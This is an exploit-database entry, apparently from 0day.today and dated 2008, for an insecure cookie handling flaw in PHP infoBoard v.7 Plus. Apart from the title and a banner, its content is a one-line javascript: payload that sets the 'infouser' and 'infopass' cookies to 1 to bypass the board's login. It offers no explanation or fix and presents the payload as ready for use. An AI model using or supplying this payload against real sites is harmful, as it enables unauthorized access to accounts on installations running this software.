id: 3756
date: 09/24/2008
title: PHP infoBoard v.7 Plus Insecure Cookie Handling Vulnerability
author: Stack
cves: 

=============================================================
PHP infoBoard v.7 Plus Insecure Cookie Handling Vulnerability
=============================================================


###############################################################################################
[+] PHP infoBoard V.7 Plus Insecure Cookie Handling Vulnerability
[+] Discovered By Stack               
[+] Greetz : All my freind              
################################################################################################
---
exploit:

javascript:document.cookie = "infouser=1; path=/"; document.cookie = "infopass=1; path=/";



#  0day.today [2023-03-26]  #